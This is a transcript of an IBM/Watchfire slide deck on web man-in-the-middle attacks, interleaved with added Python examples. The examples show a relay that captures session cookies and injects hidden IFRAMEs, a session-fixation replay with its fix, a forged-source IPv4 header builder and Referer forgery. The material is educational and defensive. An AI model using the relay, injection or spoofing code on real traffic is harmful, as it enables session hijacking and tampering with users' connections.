Unauthorized Access: Man-in-the-Middle (MITM)
DESCRIPTION
In this type of attack, the attacker attempts to insert himself in the middle of a communication for purposes of intercepting the client's data.
TRANSCRIPT
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation
By:
Balvinder Singh & Priya Nain
Unauthorized Access:
Man-in-the-Middle Attacks (MITM)
In this type of attack, the attacker attempts to insert himself in the middle of a communication for purposes of intercepting the client's data, and could potentially modify it before discarding it or sending it on to the real destination.
The attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker.
Man-in-the-middle attacks
[Figure: Client, Attacker, Server. Attacker inserting himself in the middle of a communication]
Name Origin: The name "Man-in-the-Middle" is derived from the basketball scenario where two players intend to pass a ball to each other while one player between them tries to seize it. MITM attacks are sometimes referred to as "bucket brigade attacks" or "fire brigade attacks."
MITM attack is also known as:
• Bucket-brigade attack
• Fire brigade attack
• Session hijacking
• TCP hijacking
• TCP session hijacking
• Monkey-in-the-middle attack
(Session hijacking and TCP hijacking are closely related attacks that a man in the middle can carry out, rather than strict synonyms.)
Man-in-the-middle attacks take two common forms
• Eavesdropping: the attacker simply listens to a set of transmissions to and from different hosts even though the attacker's computer isn't party to the transaction. Many relate this type of attack to a leak, in which sensitive information could be disclosed to a third party without the legitimate user's knowledge.
• Manipulation: these attacks build on the capability of eavesdropping by taking this unauthorized receipt of a data stream and changing its contents to suit a certain purpose of the attacker, perhaps spoofing an IP address, changing a MAC address to emulate another host, or some other type of modification.
Security Breach Example
Man in the Middle Scenario
• All laptop users connect to a public network
• Wireless connection can easily be compromised or impersonated
• Wired connections might also be compromised
[Figure: laptop users, public network, Internet]
Rules of Thumb – Don'ts …
Someone might be listening to the requests
– Don't browse sensitive sites
– Don't supply sensitive information
Someone might be altering the responses
– Don't trust any information given on web sites
– Don't execute downloaded code
Rules of Thumb – What Can You Do?
This leaves us with:
– Browse non-sensitive sites
– Share personal information only over secure networks
[Figure: Internet with non-sensitive ("boring") sites and sensitive ("interesting") sites]
Passive Man in the Middle Attacks
• Victim browses to a website
• Attacker views the request and forwards it to the server
• Server returns a response
• Attacker views the response and forwards it to the victim
• Other servers are not affected
Active Man in the Middle Attack
The attacker actively directs the victim to an "interesting" site. The IFRAME could be invisible.
• Victim browses to a "boring" site (My Weather Channel)
• Attacker transfers the request to the server
• Server returns a response
• Attacker adds an IFRAME referencing an "interesting" site (My Bank Site)
• Automatic request sent to the interesting server (My Bank Site)
• Other servers are not affected
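The two relay flows above, the passive one (log and forward unchanged) and the active one (splice an invisible IFRAME into the "boring" site's HTML), as an added example written for this transcript; it is not code from the IBM/Watchfire deck. The site names, the victim's request and the server's response are constructed sample traffic, and the "interesting" site URL is an assumption. The functions work on raw HTTP/1.x messages so they run offline; a real attacker would sit them between two sockets.

```python
# Added example, not from the IBM/Watchfire deck: the relay logic of a
# passive and an active web man-in-the-middle as offline functions.
# Site names, the victim's request and the server's response below are
# constructed sample data; the "interesting" site URL is an assumption.
INTERESTING_SITE = "http://bank.example/"
# Invisible IFRAME the active attacker splices into a "boring" page so the
# victim's browser fetches the "interesting" site automatically.
HIDDEN_IFRAME = ('<iframe src="%s" width="0" height="0" '
                 'style="display:none"></iframe>' % INTERESTING_SITE).encode()


def split_http(raw: bytes):
    """Split an HTTP/1.x message into (start line, {header: value}, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode()
    return lines[0].decode(), headers, body


def passive_relay(raw_request: bytes, log: list) -> bytes:
    """Passive MITM: record what the victim sent, then forward it unchanged."""
    start_line, headers, _ = split_http(raw_request)
    log.append({"request": start_line,
                "host": headers.get("host"),
                "cookie": headers.get("cookie")})
    return raw_request


def active_relay(raw_response: bytes, log: list) -> bytes:
    """Active MITM: forward the boring site's response with a hidden IFRAME
    added to its HTML body. Content-Length is recomputed so the browser
    accepts the modified body; non-HTML responses pass through untouched."""
    head, _, body = raw_response.partition(b"\r\n\r\n")
    _, headers, _ = split_http(raw_response)
    if not headers.get("content-type", "").startswith("text/html"):
        return raw_response
    if b"</body>" in body:
        body = body.replace(b"</body>", HIDDEN_IFRAME + b"</body>", 1)
    else:
        body += HIDDEN_IFRAME
    new_head = []
    for line in head.split(b"\r\n"):
        if line.lower().startswith(b"content-length:"):
            line = b"Content-Length: %d" % len(body)
        new_head.append(line)
    log.append({"injected": INTERESTING_SITE, "into": headers["content-type"]})
    return b"\r\n".join(new_head) + b"\r\n\r\n" + body


# Constructed sample traffic between the victim and the "boring" site.
VICTIM_REQUEST = (b"GET / HTTP/1.1\r\nHost: weather.example\r\n"
                  b"Cookie: sid=abc123\r\n\r\n")
BORING_RESPONSE = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
                   b"Content-Length: 28\r\n\r\n"
                   b"<html><body>Hi</body></html>")

if __name__ == "__main__":
    seen = []
    passive_relay(VICTIM_REQUEST, seen)
    tampered = active_relay(BORING_RESPONSE, seen)
    print(seen)
    print(tampered.decode())
```

Note the passive variant already captures the victim's session cookie without modifying anything on the wire, which is why the "don'ts" on the earlier slide apply even when nothing looks tampered with. The active variant has to keep Content-Length consistent, otherwise the browser truncates the page and the injected request never fires.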
Secure Connections
Login Mechanism
Session Fixation
• Attacker redirects victim to the site of interest
• Attacker returns a page with a cookie generated by the server
• Cookie is saved on the victim's computer
• A while later, the victim connects to the site (with the pre-provided cookie) and logs in
• Attacker uses the same cookie to connect to the server
• Server authenticates attacker as victim
Result – The server now authenticates the attacker as the victim/client; the attacker has the same privileges as the victim.
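The fixation flow above replayed against a toy in-memory session layer, as an added example written for this transcript (not the deck's own code). It shows the defect that makes the attack work, the server keeping the pre-login session ID, beside the fix of regenerating the ID at login. The user name, password, cookie values and the regenerate_on_login switch are constructed assumptions.

```python
# Added example, not from the deck: a toy in-memory session layer showing
# why the fixation flow on the slide works, and that regenerating the
# session ID at login stops it. Users, passwords and cookie values are
# constructed; the regenerate_on_login switch is an assumption.
import secrets


class SessionServer:
    """Minimal server: session ID cookie -> {"user": name or None}."""

    def __init__(self, regenerate_on_login: bool):
        self.regenerate_on_login = regenerate_on_login
        self.sessions = {}
        self.passwords = {"victim": "hunter2"}   # constructed credential

    def start_session(self) -> str:
        """Any visitor (including the attacker) gets a server-generated ID."""
        sid = secrets.token_hex(16)
        self.sessions[sid] = {"user": None}
        return sid

    def login(self, sid: str, user: str, password: str) -> str:
        """Returns the session ID the browser should keep after logging in."""
        if self.passwords.get(user) != password:
            raise PermissionError("bad credentials")
        if sid not in self.sessions:
            sid = self.start_session()
        if self.regenerate_on_login:
            # Fix: discard the pre-login ID so an ID the attacker planted
            # never becomes an authenticated session.
            del self.sessions[sid]
            sid = self.start_session()
        self.sessions[sid]["user"] = user     # vulnerable path keeps sid
        return sid

    def whoami(self, sid: str):
        return self.sessions.get(sid, {}).get("user")


def run_fixation_attack(regenerate_on_login: bool):
    """Replays the slide's steps; returns who the server thinks the attacker is."""
    server = SessionServer(regenerate_on_login)
    # 1. Attacker obtains a cookie generated by the server.
    planted = server.start_session()
    # 2. Attacker redirects the victim and returns a page that sets that
    #    cookie, so it is saved on the victim's computer.
    victim_cookie = planted
    # 3. A while later the victim connects with the pre-provided cookie
    #    and logs in.
    victim_cookie = server.login(victim_cookie, "victim", "hunter2")
    # 4. Attacker connects with the same cookie he planted.
    return server.whoami(planted)


if __name__ == "__main__":
    print("vulnerable server sees attacker as:", run_fixation_attack(False))
    print("fixed server sees attacker as:", run_fixation_attack(True))
```

The check a reviewer wants is the one in login(): the ID that existed before authentication must never be the ID that carries the authenticated state. Refusing to accept session IDs the server did not itself issue is a second, independent layer, but regeneration is the one that stops the deck's scenario, where the planted cookie was server-generated.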
Attack strategy – Spoofing
Spoofing is the creation of TCP/IP packets using somebody else's IP address. Routers use the "destination IP" address in order to forward packets through the Internet, but ignore the "source IP" address. That address is only used by the destination machine when it responds back to the source.
An example from cryptography is the man-in-the-middle attack, in which an attacker spoofs Alice into believing the attacker is Bob, and spoofs Bob into believing the attacker is Alice, thus gaining access to all messages in both directions without the trouble of any cryptanalytic effort.
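What "creating a packet using somebody else's IP address" comes down to, as an added example written for this transcript (not the deck's own code): an IPv4 header is built with an arbitrary source address and a valid header checksum, then parsed back the way a receiver would see it. The addresses, TTL and identification value are constructed; actually putting the packet on the wire would need a raw socket (socket.SOCK_RAW, run as root) and is left out.

```python
# Added example, not from the deck: building an IPv4 header that carries
# somebody else's source address, with a valid header checksum, and parsing
# it back. Addresses, TTL and identification are constructed. Sending it
# would need a raw socket (socket.SOCK_RAW, run as root) and is left out.
import socket
import struct

IPV4_FMT = "!BBHHHBBH4s4s"   # 20-byte header without options


def ones_complement_checksum(data: bytes) -> int:
    """RFC 1071 checksum as used in the IPv4 header."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                      # fold carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4_header(src: str, dst: str, payload_len: int,
                      proto: int = 6, ttl: int = 64, ident: int = 0x1234) -> bytes:
    """Return a 20-byte IPv4 header. Nothing checks that `src` is ours:
    routers forward on `dst` only, so `src` is whatever the sender writes."""
    version_ihl = (4 << 4) | 5
    total_len = 20 + payload_len
    header = struct.pack(IPV4_FMT, version_ihl, 0, total_len, ident, 0,
                         ttl, proto, 0,
                         socket.inet_aton(src), socket.inet_aton(dst))
    csum = ones_complement_checksum(header)
    return header[:10] + struct.pack("!H", csum) + header[12:]


def parse_ipv4_header(packet: bytes) -> dict:
    """Decode the fields a receiver (or an IDS) would look at."""
    f = struct.unpack(IPV4_FMT, packet[:20])
    return {"version": f[0] >> 4, "ihl": f[0] & 0x0F, "total_len": f[2],
            "ttl": f[5], "proto": f[6],
            "src": socket.inet_ntoa(f[8]), "dst": socket.inet_ntoa(f[9]),
            # a header with a correct checksum sums to zero
            "checksum_ok": ones_complement_checksum(packet[:20]) == 0}


if __name__ == "__main__":
    # Claim to be 10.0.0.5 while sending toward 192.0.2.1 (constructed).
    spoofed = build_ipv4_header("10.0.0.5", "192.0.2.1", payload_len=20)
    print(parse_ipv4_header(spoofed))
```

The checksum only protects against corruption, not forgery: anyone can compute it for any source address, which is the point the slide makes about routers ignoring the source field. This is also why the full man-in-the-middle needs more than a forged source (the reply goes to the spoofed host, not the attacker) unless the attacker also sits on the return path.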
Types of Spoofing
• E-Mail address Spoofing
• URL Spoofing and Phishing
• Referrer Spoofing
URL spoofing and phishing
Another kind of spoofing is "webpage spoofing", also known as phishing. In this attack, a legitimate web page such as a bank's site is reproduced in "look and feel" on another server under the control of the attacker. The main intent is to fool the users into thinking that they are connected to a trusted site, for instance to harvest usernames and passwords.
Referrer spoofing
Some websites, especially pay sites, allow access to their materials only from certain approved (login) pages. This is enforced by checking the Referer header of the HTTP request. Since that header is supplied by the client, an attacker can simply set it to the approved page.
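The Referer gate just described, with the forged request that passes it, beside a server-minted token that a client cannot forge, as an added example written for this transcript (not the deck's own code). The pay site's login URL, the server secret, the header name X-Access-Token and the user names are constructed assumptions.

```python
# Added example, not from the deck: the Referer gate the slide describes
# beside a server-minted token the attacker cannot forge. The pay site's
# URLs, the secret, the X-Access-Token header and the user names are
# constructed assumptions.
import hashlib
import hmac
import secrets

LOGIN_PAGE = "https://pay.example/login"          # assumed approved page
SERVER_SECRET = b"constructed-server-side-secret"  # never leaves the server


def allowed_by_referer(headers: dict) -> bool:
    """The check from the slide: serve material only if the request claims
    to come from the approved login page. Referer is sent by the client."""
    return headers.get("Referer", "").startswith(LOGIN_PAGE)


def issue_access_token(user: str) -> str:
    """Minted by the server after a real login: user:nonce:HMAC."""
    nonce = secrets.token_hex(8)
    mac = hmac.new(SERVER_SECRET, f"{user}:{nonce}".encode(),
                   hashlib.sha256).hexdigest()
    return f"{user}:{nonce}:{mac}"


def allowed_by_token(headers: dict) -> bool:
    """Only a token made with SERVER_SECRET verifies; the client can write
    any value into the header but cannot compute the MAC."""
    parts = headers.get("X-Access-Token", "").split(":")
    if len(parts) != 3:
        return False
    user, nonce, mac = parts
    expected = hmac.new(SERVER_SECRET, f"{user}:{nonce}".encode(),
                        hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def forged_request() -> dict:
    """What an attacker who never logged in can send: any header values."""
    return {"Referer": LOGIN_PAGE,                       # spoofed
            "X-Access-Token": "victim:0123456789abcdef:" + "0" * 64}


if __name__ == "__main__":
    print("referer gate lets forged request through:",
          allowed_by_referer(forged_request()))
    print("token gate lets forged request through:",
          allowed_by_token(forged_request()))
    print("token gate accepts real token:",
          allowed_by_token({"X-Access-Token": issue_access_token("alice")}))
```

The token here is deliberately minimal (no expiry, no binding to the session); in a deployment it would be the existing authenticated session, not a second credential. The point is the asymmetry: Referer costs the attacker nothing to set, while anything keyed on a server-side secret does.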
E-mail address spoofing
The sender information shown in e-mails (the "From" field) can be spoofed easily. This technique is commonly used by spammers to hide the origin of their e-mails and leads to problems such as misdirected bounces.
For example, an attacker sends a message with an altered "From" field; the user thinks the message came from a trusted person, may reply to it, and the data in the reply may be misused.
Defending against Spoofing
Spoofing is difficult to defend against, as the attacks are mostly passive by nature.
• What you get is a web page that is different from what you are expecting.
In very targeted attacks it is quite possible that you may never know that attackers have entered your system.
• By using a virtual proxy generator
• By using a login mechanism